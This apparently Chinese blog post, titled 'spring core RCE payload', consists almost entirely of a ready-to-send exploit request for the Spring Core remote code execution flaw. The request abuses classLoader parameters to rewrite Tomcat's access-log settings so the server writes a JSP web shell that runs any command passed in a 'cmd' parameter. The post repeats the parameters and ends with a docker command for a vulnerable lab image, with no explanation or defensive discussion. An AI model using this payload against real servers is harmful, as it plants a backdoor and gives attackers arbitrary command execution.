spring core RCE payload
GET /?class.module.classLoader.resources.context.parent.parent.appBase=./&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_4&class.module.classLoader.resources.context.parent.pipeline.first.checkExists=true&class.module.classLoader.resources.context.parent.pipeline.first.rotatable=true&class.module.classLoader.resources.context.parent.pipeline.first.prefix=test1&class.module.classLoader.resources.context.parent.pipeline.first.buffered=false&class.module.classLoader.resources.context.parent.pipeline.first.pattern=%3Cjsp%3Ascriptlet%3Eout.println(Runtime.getRuntime().exec(request.getParameter(%22cmd%22)))%3B%3C%2Fjsp%3Ascriptlet%3E HTTP/1.1 Host: 192.168.x.x:8082 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close
?class.module.classLoader.resources.context.parent.parent.appBase=./&
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_4&
class.module.classLoader.resources.context.parent.pipeline.first.checkExists=true&
class.module.classLoader.resources.context.parent.pipeline.first.rotatable=true&
class.module.classLoader.resources.context.parent.pipeline.first.prefix=test1&
class.module.classLoader.resources.context.parent.pipeline.first.buffered=false&
class.module.classLoader.resources.context.parent.pipeline.first.pattern=%3Cjsp%3Ascriptlet%3Eout.println(Runtime.getRuntime().exec(request.getParameter(%22cmd%22)))%3B%3C%2Fjsp%3Ascriptlet%3E
漏洞环境:
docker pull vulfocus/spring-core-rce-2022-03-29
【版权所有@Sevck 博客地址http://www.cnblogs.com/sevck】 可以转载,注明出处.
